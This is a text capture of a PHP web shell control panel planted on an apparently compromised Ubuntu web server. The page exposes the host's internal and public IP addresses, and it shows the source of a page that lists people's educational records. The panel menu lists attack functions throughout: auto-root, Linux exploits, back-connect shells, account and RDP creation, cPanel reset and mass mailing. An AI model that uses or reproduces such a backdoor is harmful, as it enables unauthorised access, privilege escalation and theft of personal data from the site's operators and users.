Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 3.129.128.179
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
educational /
[ HOME SHELL ]
Name
Size
Permission
Action
educational.php
3.87
KB
-rw-r--r--
educational_editor.php
4.53
KB
-rw-r--r--
educational_list.php
6.93
KB
-rw-r--r--
view.php
3.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view.php
<?php session_start(); include("../common/config.php"); include("../common/functions.php"); include("../homepage/header.php"); include("../homepage/headermenu.php"); if(empty($_SESSION["username"])) { Header("Location: ../login/login.php"); } $GovtId= $_REQUEST['GovtId']; $stmt = $conn->prepare("SELECT ed.id, ed.GovtId, ed.instName, ed.subjectname, d.DegreeName, ed.passyear, ed.exmresult, ed.GpA, ed.distinc FROM educational ed LEFT JOIN degree d ON(ed.degree_id=d.id) WHERE ed.userinfo_id=".$_SESSION["user_id"]." and ed.GovtId= ?"); $stmt->bind_param("s",$GovtId); $stmt->execute(); $result = $stmt->get_result(); $numrows=$result->num_rows; if($numrows==0) exit('No rows'); $slno=0; ?> <div class="container fullheight"> <div class="row"> <div class="col-md-12"> <br> <div class="row"> <div class="col-md-12"> <h4> শিক্ষাগত তথ্য</h4> <table class="table table-bordered table-striped table-condensed banglafont"> <tr> <td>PIMS আইডি</td> <td>শিক্ষা প্রতিষ্ঠানের নাম</td> <td>পঠিত বিষয়</td> <td>ডিগ্রীর নাম</td> <td>পাশের বছর</td> <td>পরীক্ষার রেজাল্ট</td> <td>GPA/CGPA</td> <td>ডিসটিংশন</td> </tr> <?php while($row = $result->fetch_assoc()) { $GovtId = $row["GovtId"]; $id = $row["id"]; $instName = $row["instName"]; $subjectname = $row["subjectname"]; $DegreeName = $row["DegreeName"]; $passyear = $row["passyear"]; $exmresult = $row["exmresult"]; $GpA = $row["GpA"]; $distinc = $row["distinc"]; ?> <tr> <td><?=bangladate($GovtId) ?></td> <td><?=$instName ?></td> <td><?=$subjectname ?></td> <td><?=$DegreeName ?></td> <td><?=$passyear ?></td> <td><?=$exmresult ?></td> <td><?=$GpA ?></td> <td><?=$distinc ?></td> </tr> <?php } ?> </table> </div> </div> </div> </div> </div>
Close